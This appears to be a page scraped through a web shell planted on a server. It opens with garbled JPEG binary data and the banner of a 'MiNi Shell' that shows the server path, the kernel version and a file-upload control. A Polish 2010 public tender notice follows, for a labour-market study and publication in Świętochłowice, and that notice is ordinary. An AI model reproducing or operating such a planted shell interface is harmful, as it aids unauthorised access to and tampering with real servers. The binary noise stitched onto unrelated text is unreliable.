JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100203/23877-N-2010.html

<p class="kh_header"><b>Świętochłowice: Przeprowadzenie kompleksowej usługi badania lokalnego rynku pracy na terenie powiatu świętochłowickiego, w zakresie diagnozy stanu aktualnego jak i prognozy na lata 2010-2015, opracowanie raportów, przygotowanie i wydanie publikacji książkowej zawierającej podsumowanie wykonanych badań i analiz wraz z wnioskami  i rekomendacjami, stworzenie prezentacji multimedialnej oraz przeprowadzenie prezentacji na konferencji podsumowującej wyniki badań oraz przeprowadzenie monitoringu.</b><br>
<b>Numer ogłoszenia: 23877 - 2010; data zamieszczenia: 03.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Świętochłowicach , ul. Plebiscytowa 3/7, 41-600 Świętochłowice, woj. śląskie, tel. 032 3462700, faks 032 3462729.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka organizacyjna samorządu terytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie kompleksowej usługi badania lokalnego rynku pracy na terenie powiatu świętochłowickiego, w zakresie diagnozy stanu aktualnego jak i prognozy na lata 2010-2015, opracowanie raportów, przygotowanie i wydanie publikacji książkowej zawierającej podsumowanie wykonanych badań i analiz wraz z wnioskami  i rekomendacjami, stworzenie prezentacji multimedialnej oraz przeprowadzenie prezentacji na konferencji podsumowującej wyniki badań oraz przeprowadzenie monitoringu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem Zamówienia jest przeprowadzenie kompleksowej usługi badania lokalnego rynku pracy na terenie powiatu świętochłowickiego, w zakresie diagnozy stanu aktualnego jak i prognozy na lata 2010-2015, opracowanie raportów, przygotowanie i wydanie publikacji książkowej zawierającej podsumowanie wykonanych badań i analiz wraz z wnioskami i rekomendacjami, stworzenie prezentacji multimedialnej oraz przeprowadzenie prezentacji na konferencji podsumowującej wyniki badań oraz przeprowadzenie monitoringu.

Przedmiot zamówienia składa się z VI etapów.

Etap I
1. Przeprowadzenie badania pilotażowego:
-opracowanie narzędzia badawczego do badania pilotażowego - kwestionariusza ankiety do badania pilotażowego (marzec 2010 r.), zawierających pytania otwarte i zamknięte,
-przeprowadzenie badania pilotażowego - 80 wybranych przedsiębiorstw z terenu miasta Świętochłowice, w tym dobór respondentów  (marzec 2010 r. - kwiecień 2010 r.). 
-udoskonalenie narzędzia badawczego - kwestionariusza ankiety do badania właściwego (kwiecień 2010 r.).
2. Problematyka badawcza:
-rozeznanie aktualnej i prognozowanej sytuacji lokalnych przedsiębiorców, 
-charakterystyka kondycji ekonomicznej badanych przedsiębiorstw,
-określenie planów kadrowych w zakresie rekrutacji oraz planowanych zwolnień,
-charakterystyka profili oferowanych stanowisk pracy,
-wymagań dotyczących kompetencji przyszłych pracowników,
-określenie gotowości pracodawców do wykorzystywania elastycznych form zatrudnienia; dostępność elastycznych rozwiązań czasu pracy,
-wskazanie aktualnych oraz perspektywicznych zawodów deficytowych,
-prognoza sytuacji ekonomicznej poszczególnych branż, 
-analiza szans i zagrożeń dla branż,
-analiza planów rozwojowych i inwestycyjnych badanych podmiotów,
-ocena poziomu innowacyjności przedsiębiorstw,
-określenie zapotrzebowania na szkolenia dla badanych przedsiębiorstw,
-określenie poziomu współpracy i  korzystania z pomocy/usług urzędu pracy (np. doposażenie stanowisk pracy, zatrudnianie poprzez prace interwencyjne, staże),
-możliwość korzystania/ubiegania się o środki UE,
-segregacji poziomej i pionowej rynku pracy,
-różnice w płacach kobiet i mężczyzn.
Technika badawcza: wywiad bezpośredni przy użyciu kwestionariusza ankiety.
Kwestionariusz ankiety zostanie dostarczony Zamawiającemu najpóźniej do dnia 26 kwietnia 2010 r. Zamawiający  ma 2 dni robocze na zgłoszenie ewentualnych uwag do opracowanego kwestionariusza, a Wykonawca 2 dni robocze na ich wprowadzenie i przedstawienie kwestionariusza do ponownej akceptacji. Wykonawca będzie mógł rozpocząć badania właściwe po akceptacji przez Zamawiającego  ostatecznej wersji kwestionariusza ankiet.

Etap II
Przeprowadzenie badań właściwych w zakresie diagnozy stanu aktualnego jak i prognozy na lata 2010-2015:
1.Opracowanie narzędzia badawczego  - 2 kwestionariuszy ankiet do badań właściwych, zawierających pytania otwarte i zamknięte.
Wykonawca będzie mógł rozpocząć badania właściwe po akceptacji przez Zamawiającego   2 kwestionariuszy ankiet. 
Kwestionariusze ankiety zostaną dostarczone najpóźniej do 7 maja 2010 r. 
Zamawiający  ma 2 dni robocze na zgłoszenie ewentualnych uwag do opracowanego kwestionariusza, a Wykonawca 2 dni robocze na ich wprowadzenie i przedstawienie kwestionariusza do ponownej akceptacji. Wykonawca będzie mógł rozpocząć badania właściwe po akceptacji przez Zamawiającego  ostatecznej wersji kwestionariusza ankiet.
2.Przeprowadzenie badań wśród 800 losowo wybranych podmiotów gospodarczych z terenu miasta Świętochłowice, w tym dobór respondentów (maj 2010 r. -  wrzesień 2010 r.).
Problematyka badawcza:
-rozeznanie aktualnej i prognozowanej sytuacji lokalnych przedsiębiorców, 
-charakterystyka kondycji ekonomicznej badanych przedsiębiorstw,
-określenie planów kadrowych w zakresie rekrutacji oraz planowanych zwolnień,
-charakterystyka profili oferowanych stanowisk pracy,
-wymagań dotyczących kompetencji przyszłych pracowników,
-określenie gotowości pracodawców do wykorzystywania elastycznych form zatrudnienia; dostępność elastycznych rozwiązań czasu pracy,
-wskazanie aktualnych oraz perspektywicznych zawodów deficytowych,
-prognoza sytuacji ekonomicznej poszczególnych branż, 
-analiza szans i zagrożeń dla branż,
-analiza planów rozwojowych i inwestycyjnych badanych podmiotów,
-ocena poziomu innowacyjności przedsiębiorstw,
-określenie zapotrzebowania na szkolenia dla badanych przedsiębiorstw,
-określenie poziomu współpracy i  korzystania z pomocy/usług urzędu pracy (np. doposażenie stanowisk pracy, zatrudnianie poprzez prace interwencyjne, staże),
-możliwość korzystania/ubiegania się o środki UE,
-segregacji poziomej i pionowej rynku pracy,
-różnice w płacach kobiet i mężczyzn.
Technika badawcza: wywiad bezpośredni przy użyciu kwestionariusza ankiety.

3.Przeprowadzenie badań z przedstawicielami 11 szkół ponadgimnzajalnych 
(maj 2010 r.- czerwiec 2010 r.). 
Problematyka badawcza:
-zbadanie profilu kształcenia w stosunku do potrzeb rozwijającej się lokalnej gospodarki,
-analiza kierunków kształcenia szkół ponadgimnazjalnych,
-planów dotyczących zmian kierunków kształcenia,
-oczekiwania Dyrektorów szkół/ osób upoważnionych do reprezentowania szkół co do współpracy z instytucjami miejskimi.
Technika badawcza: wywiad bezpośredni przy użyciu kwestionariusza ankiety.

4. Przeprowadzenie badań wśród 314 uczniów ostatnich klas świętochłowickich szkół ponadgimnazjalnych (maj 2010 r.- czerwiec 2010 r.). 
Problematyka badawcza:
-określenie w procentach ile młodzieży zamierza kontynuować naukę; w jakim trybie (zaocznie, wieczorowo, dziennie); określenie poziomu kształcenia,
-poznanie najczęściej wybieranych profili kształcenia,
-sprawdzenie adekwatności wyboru przez uczniów przyszłego zawodu w stosunku do potrzeb rynku pracy,
-poznanie planów zawodowych uczniów,
-poznanie preferencji form zatrudnienia,
-sprawdzenie czy uczniowie zetknęli się w swoich szkołach  z przejawami dyskryminacji (m.in. brak równego dostępu do edukacji).
Technika badawcza: wywiad bezpośredni przy użyciu kwestionariusza ankiety.

Po przeprowadzeniu II etapu  Wykonawca przekaże Zamawiającemu w miesiącu styczniu 2011 r. w formie uporządkowanej zarchiwizowane kwestionariusze ankiet (opisane, ponumerowane, spięte w segregatorach lub zszyte, pogrupowane jako: badanie I - wskazane w pkt. 2, badanie II wskazane w pkt. 3, badanie III - wskazane w pkt. 4).


Etap III
1. Opracowanie i analiza wyników przeprowadzonych badań 
(lipiec 2010 r. -  październik 2010 r.)

2.Stworzenie i wydanie 3 raportów z badań właściwych, w wersji papierowej i elektronicznej, zawierających opis badania oraz wyniki m.in. zestawione na tablicach i rysunkach
(październik 2010 r.- grudzień 2010 r.).
Raport z badania Etapu II, pkt 2: powinien zawierać nie więcej niż 80 stron w języku polskim, zawierający opis badania oraz wyniki m.in. zestawione na tablicach i rysunkach.
Raport z badania Etapu II, pkt 3: powinien zawierać nie więcej niż 30 stron w języku polskim, zawierający opis badania oraz wyniki m.in. zestawione na tablicach i rysunkach.

Raport z badania Etapu II, pkt 4: powinien zawierać nie więcej niż 50 stron w języku polskim, zawierający opis badania oraz wyniki m.in. zestawione na tablicach i rysunkach.
Wszystkie raporty powinny zawierać opis badania oraz wyniki m.in. zestawione na tablicach   i rysunkach. Trzy raporty zostaną przedstawione w formie pisemnej i na nośniku CD.
Wykonawca zobowiązany jest przedstawić projekty raportów do konsultacji Zamawiającemu do dnia 01 grudnia 2010 r. 
Zamawiający  ma 5 dni roboczych na zgłoszenie uwag do opracowanych raportów,  a Wykonawca 2 dni robocze na ich wprowadzenie i przedstawienie raportów do ponownej akceptacji. 


Etap IV
Opracowanie i wydruk publikacji książkowej (wraz z szatą graficzną) w języku polskim  w nakładzie 1500 sztuk zawierającej końcowe wyniki badań wraz z wnioskami i rekomendacjami m.in. zestawione na tablicach i rysunkach.
Format publikacji:
-szerokość 160 mm, wysokość 230,6 mm,
-ilość stron min.-120, max -150,
-okładka: kreda błysk,
-druk pełnokolorowy (okładka i zawartość), dwustronny.

Publikacja zawierać będzie:
-wstęp i opis projektu,
-spis treści,
-badania świętochłowickiego rynku - wyniki z przeprowadzonych badań właściwych,
-wnioski i rekomendacje,
-spis tabel i wykresów.


Publikacja ma przedstawiać ponadto:
-określenie aktualnej sytuacji firm, wielkości zatrudnienia, planów na przyszłość związanych z rozwojem firmy, ustalenia co do oczekiwań pracodawców odnośnie pożądanych kompetencji pracowniczych w zawodach,
-określenie trendów rozwojowych dotyczących m.in. tworzenia i likwidacji miejsc pracy,
-zbadanie czy w przedsiębiorstwach wdrażana jest polityka równości szans kobiet i mężczyzn,
-zbadanie profilu kształcenia lokalnych szkół ponadgimnazjalnych, 
-poznanie planów zawodowych i zbieżności wyboru zawodu uczniów ostatnich klas świętochłowickich szkół ponadgimnazjalnych w stosunku do potrzeb rynku pracy,
-ustalenie prawidłowości w kształtowaniu się zapotrzebowania na poszczególne zawody, oczekiwane kompetencje zgłaszane na świętochłowickim rynku,
-poziom świadomości społeczeństwa (przedsiębiorców, uczniów itd.) w zakresie równości szans kobiet i mężczyzn, propagowania równego statusu kobiet i mężczyzn, przełamywania stereotypowego postrzegania zawodów, kierunków kształcenia; wyrównania szans edukacyjnych i rozwoju zawodowego kobiet i mężczyzn,
-sformułowanie właściwych mechanizmów zaradczych w kontekście pojawiających się zmian gospodarczych.
Wykonawca zobowiązany jest przedstawić projekt publikacji do konsultacji Zamawiającemu do dnia 10 grudnia 2010 r. 
Zamawiający  ma 5 dni roboczych na zgłoszenie ewentualnych uwag do opracowanej publikacji. Wykonawca  ma 2 dni robocze na ich wprowadzenie i przedstawienie publikacji do ponownej akceptacji. Wykonawca do dnia 31 grudnia 2010 r. dostarczy Zamawiającemu 1500 sztuk publikacji.

Etap V
Stworzenie prezentacji multimedialnej, nie więcej niż 40 slajdów, w wersji elektronicznej na nośniku CD-ROM oraz w wersji papierowej; udział w konferencji wraz z prezentacją wyników oraz uczestnictwo w panelu dyskusyjnym.   
Wykonawca zobowiązany jest przedstawić projekt prezentacji multimedialnej do konsultacji Zamawiającemu do dnia 24 marca 2011 r. 
Zamawiający  ma 2 dni robocze na zgłoszenie uwag do opracowanej prezentacji multimedialnej, a Wykonawca 2 dni robocze na ich wprowadzenie i przedstawienie prezentacji multimedialnej do ponownej akceptacji. 


Etap VI
Monitoring rezultatów.
Monitorowanie rezultatów miękkich odbędzie się dwukrotnie wśród osób, które uczestniczyły w badaniu właściwym. 
Pierwsze badanie monitoringowe (maj 2010 r. - wrzesień 2010 r.) rozpocznie się wraz z badaniami właściwymi.
Próba badawcza -  5% respondentów  spośród 1125 respondentów z badań właściwych,w tym dobór respondentów.

Drugie badanie (kwiecień 2011 r.) zostanie przeprowadzone z tymi samymi osobami pod koniec projektu w formie wywiadu telefonicznego.


Monitoring ma dać odpowiedź na stawiane pytania:
-Czy zostały upowszechnione wyniki badań w zakresie równości szans kobiet i mężczyzn na rynku pracy?
-Czy nastąpił wzrost wiedzy na temat lokalnego rynku pracy przez badanych przedsiębiorców i uczniów?
-Czy nastąpił wzrost poziomu wiedzy w zakresie prognozowania zmian na rynku pracy?

-Czy zwiększyła się świadomość społeczeństwa w zakresie równości szans  kobiet   i mężczyzn na rynku pracy?

Opracowane wyniki w formie raportu z monitoringu Wykonawca dostarczy Zamawiającemu do 29 kwietnia 2011 r., w wersji elektronicznej na nośniku  CD-ROM i w wersji papierowej.



Zakres szczegółowy zamówienia:
-Badania wśród pracodawców i szkół należy przeprowadzić w formie wywiadu bezpośredniego z osobami upoważnionymi do reprezentowania przedsiębiorstwa/szkoły.
-Na Wykonawcy ciąży obowiązek poinstruowania ankieterów w jaki sposób mają informować respondentów o współfinansowaniu projektu przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.
-Ankieterzy zobowiązani są wręczyć każdemu respondentowi gadżet - długopis      z logotypem UE i EFS. Zamawiający przekaże Wykonawcy gadżety na podstawie protokołu zdawczo-odbiorczego. Wykonawca zobowiązany będzie przekazać je ankietowanym, następnie ci będą zobowiązani przekazywać je respondentom.
-Wykonawca zobowiązany jest do umieszczenia na narzędziach badawczych, raportach, publikacjach i innych pozostałych produktach logo Programu Operacyjnego Kapitał Ludzki, flagi Unii Europejskiej z podpisem Unia Europejska, Europejski Fundusz Społeczny oraz podpis Projekt współfinansowany przez Unię Europejską   w ramach Europejskiego Funduszu Społecznego. Zestawienie logotypów, dobory kolorów, wielkości obszaru ochronnego muszą być zgodne z Wytycznymi dotyczącymi oznaczania projektów w ramach PO KL, dostępnymi na stronie http://efs.wup-katowice.pl
-Wykonawca zgodnie z wytycznymi zobowiązany jest stosować zasadę Gender mainstreaming w projekcie czyli sposób uwzględniania zasady równości szans płci    w ramach projektów badawczych. Wszystkie dane dotyczące osób powinny zostać 
podzielone na płeć. Rezultaty badania (monitoring) powinny być zaprezentowane    z uwzględnieniem podziału na płeć oraz inne ważne dla badania cechy (wiek, stopień niepełnosprawności, miejsce zamieszkania itp.)
-Zamawiający dostarczy Wykonawcy usługi bazę danych lokalnych przedsiębiorstw (na dzień 31.07.09 r., uzyskaną z Urzędu Statystycznego w Katowicach) i szkół (na dzień 11.09.09 r. uzyskaną z Wydziału Edukacji Urzędu Miejskiego                  w Świętochłowicach).
-Akceptacji kwestionariuszy ankiet, raportów, publikacji, prezentacji multimedialnej dokona pracownik wyznaczony przez Zamawiającego.

2.3. Wykonawca zapewni Zamawiającemu możliwość stałego monitorowania przebiegu procesu badawczego w tym kontrole terenowe, natychmiastowy wgląd w wyniki oraz różnorodne możliwości raportowania.
2.4. Zamawiający wyklucza możliwość składania ofert wariantowych oraz częściowych.
2.5. Płatności będą dokonywane w terminie 14 dni od otrzymania przez Zamawiającego prawidłowo wystawionej faktury za każdy etap zamówienia oddzielnie, przelewem na wskazany rachunek bankowy Wykonawcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.30.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków szczegółowych nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń.
W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia wykonawcy w okolicznościach o których mowa w art. 24 ust. 1 ustawy należy złożyć oświadczenie o braku podstaw do wykluczenia oraz:
- aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
-  aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
-  aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega 
z opłacaniem  składek na ubezpieczenie zdrowotne i społeczne lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest posiadanie przez Wykonawcę niezbędnej wiedzy i doświadczenia w zakresie przeprowadzania badań wymienionych w przedmiocie zamówienia. Wymaga się aby wykonawca w okresie trzech lat poprzedzających dzień złożenia ofert wykonał 3 zamówienia podobne do przedmiotu tego zamówienia na kwotę minimum 70 tys. zł (kwota dotyczy każdego zamówienia osobno). Wykonawca jest zobowiązany do posiadania certyfikatu potwierdzającego jakość wykonanych usług w zakresie badań jakościowych i ilościowych. Ocena spełnienia warunków szczegółowych nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń.
Każdy z Wykonawców powinien złożyć oświadczenia, że posiada niezbędną wiedzę i doświadczenie. Jednocześnie należy załączyć:
- wykaz wykonanych a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływałem terminu składania ofert,a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie;
- certyfikat potwierdzający jakość wykonanych usług w zakresie badań jakościowych i ilościowych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków szczegółowych nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów 
i oświadczeń.
Każdy z Wykonawców powinien załączyć:
- wykaz narzędzi wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług w celu realizacji zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków szczegółowych nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów 
i oświadczeń.
Każdy z Wykonawców powinien załączyć:
- wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu Zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania Zamówienia, a także zakresu wykonywanych przez nich czynności, oraz informację o podstawie do dysponowania tymi osobami;
-oświadczenie, że osoby które będą uczestniczyć w wykonywaniu Zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków szczegółowych nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń.
Każdy z Wykonawców powinien złożyć oświadczenie potwierdzające, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie Zamówienia oraz: 
- opłaconą polisę a w przypadku jej braku inny dokument potwierdzający, że  Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności 
związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
